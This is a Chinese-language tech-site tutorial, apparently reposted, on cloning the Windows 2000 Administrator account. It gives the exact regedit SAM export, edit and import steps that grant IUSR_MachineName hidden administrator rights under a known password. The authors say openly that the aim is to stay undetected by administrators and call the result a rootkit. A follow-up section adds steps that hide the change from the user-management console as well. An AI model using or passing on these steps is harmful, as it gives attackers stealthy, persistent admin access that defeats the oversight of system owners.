当前位置: 首页 > 图文教程 > 服务器 > Windows服务器 > 克隆windows 2000管理员帐号

Windows服务器
实例讲解Windows 2003分区增容功能
WIN2003服务器端安全配置的一点简单经验
Windows 2003中快速建立ADSL拨号
远程如何修改Windows 2003系统机器名
微软揭示Windows 2003 R2关键性技术
Windows Server 2003组策略排障六法
感受Windows 2003 SP1安全配置向导功能
微软测试Windows Server 2003集群版
Win 2003系统传真功能的配置及使用
巧用Win 2003构筑校园网服务器防火墙
抢先看!WinServer 2003 R2 RTM发布
九招Windows 2003系统设置小技巧
巧施妙计—突破Win 2003系统的种种限制
巧妙启用Windows 2003的远程桌面功能
部署Windows Server 2003终端服务
在Win2003配置DNS的Internet访问
Windows 2003下提高FSO的安全性
Windows Server 2003 SP1 今日发布
微软将在HEC上发布Windows 2003 64-bit
快下载!值得装Windows 2003 SP1三大原因

Windows服务器 中的 克隆windows 2000管理员帐号


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-01   浏览: 42 ::
收藏到网摘: n/a

  首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。

  运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行 regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行-[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的'1F4'修改为'3E9'后执行 regedit /s adam.reg 导入该Reg文件

  然后运行

  net user IUSR_MachineName Sometips

  修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)

  OK,大功告成...

  这样,我们拥有和默认管理员一样的桌面、一样的Profile.....

  而且,当我们运行 net localgroup administrators 时,看看结果:

  C:\>net localgroup administrators

  Alias name administrators

  Comment Administrators have complete and unrestricted access to the computer/domain

  Members

  ------------------------------------------------------------------------------

  Administrator

  The command completed successfully.

  再看看USER2SID的输出结果:

  C:\>user2sid Administrator

  S-1-5-21-1004336348-1078145449-854245398-500

  Number of subauthorities is 5

  Domain is IDONTKNOW

  Length of SID in memory is 28 bytes

  Type of SID is SidTypeUser

  C:\>user2sid iusr_machinename

  S-1-5-21-1004336348-1078145449-854245398-1001

  Number of subauthorities is 5

  Domain is IDONTKNOW

  Length of SID in memory is 28 bytes

  Type of SID is SidTypeUser   
  我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)

  ^_^,这算不算RootKit...

  附:

  1、感谢叮叮付出需要reinstall OS的代价...

  2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...

  -----------------------------------------------------------------------------

  叮叮 的补充完善

  很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。

  现给出解决办法。

  方法同上,不过这次修改内容多一些。即

  这次要导出两个key内容:

  一个是adam提到的

  regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

  然后另外一个是你需要修改那个账号的值

  regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9

  然后按照adam提到的修改adam.reg

  “将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID”

  现在,你还要从iusr.reg文件中复制一下内容

  就是将iusr.reg文件中“'V'=hex:0”开始一直到iusr.reg文件结束部分复制下来

  然后替换掉adam.reg中同样位置的部分

  最后使用

  regedit /s adam.reg

  导入该Reg文件

  呵呵,别忘了给这个IUSR_MachineName改密码哦。

  hehe,ok,大功告成。

  现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和

  管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。

  都和修改前没有任何区别。

  好了,补充结束。